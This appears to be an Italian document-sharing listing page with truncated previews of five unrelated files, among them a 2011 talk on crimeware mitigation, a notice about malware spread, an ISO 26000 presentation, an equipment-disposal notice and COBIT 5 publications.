Crimeware e sua evoluzione Come mitigare il fenomeno Crimeware e sua evoluzione Come mitigare il fenomeno Roma, 10 maggio 2011 Giovanni Napoli CISSP EMEA South SE Manager 1 Agenda Sicurezza e privacy richiedono un approccio multilivello per mitigare attacchi

Dettagli

La struttura della ISO 26000. Antonio Astone 26 giugno 2007

La struttura della ISO 26000. Antonio Astone 26 giugno 2007 La struttura della ISO 26000 Antonio Astone 26 giugno 2007 Description of operational principles (1/2) Operational principles guide how organizations act. They include: Accountability an organization should

Dettagli

Recente aumento della diffusione di virus Malware

Recente aumento della diffusione di virus Malware Recente aumento della diffusione di virus Malware Recentemente è stato registrato un aumento della diffusione di particolari tipi di virus chiamati generalmente Malware che hanno come scopo principale

Dettagli

INFORMAZIONE AGLI UTENTI DI APPARECCHIATURE DOMESTICHE O PROFESSIONALI

INFORMAZIONE AGLI UTENTI DI APPARECCHIATURE DOMESTICHE O PROFESSIONALI INFORMAZIONE AGLI UTENTI DI APPARECCHIATURE DOMESTICHE O PROFESSIONALI Ai sensi dell art. 13 del Decreto Legislativo 25 luglio 2005, n. 151 "Attuazione delle Direttive 2002/95/CE, 2002/96/CE e 2003/108/CE,

Dettagli

Pubblicazioni COBIT 5

Pubblicazioni COBIT 5 Pubblicazioni COBIT 5 Marco Salvato CISA, CISM, CGEIT, CRISC, COBIT 5 Foundation, COBIT 5 Trainer 1 SPONSOR DELL EVENTO SPONSOR DI ISACA VENICE CHAPTER CON IL PATROCINIO DI 2 La famiglia COBIT 5 3 Aprile

Dettagli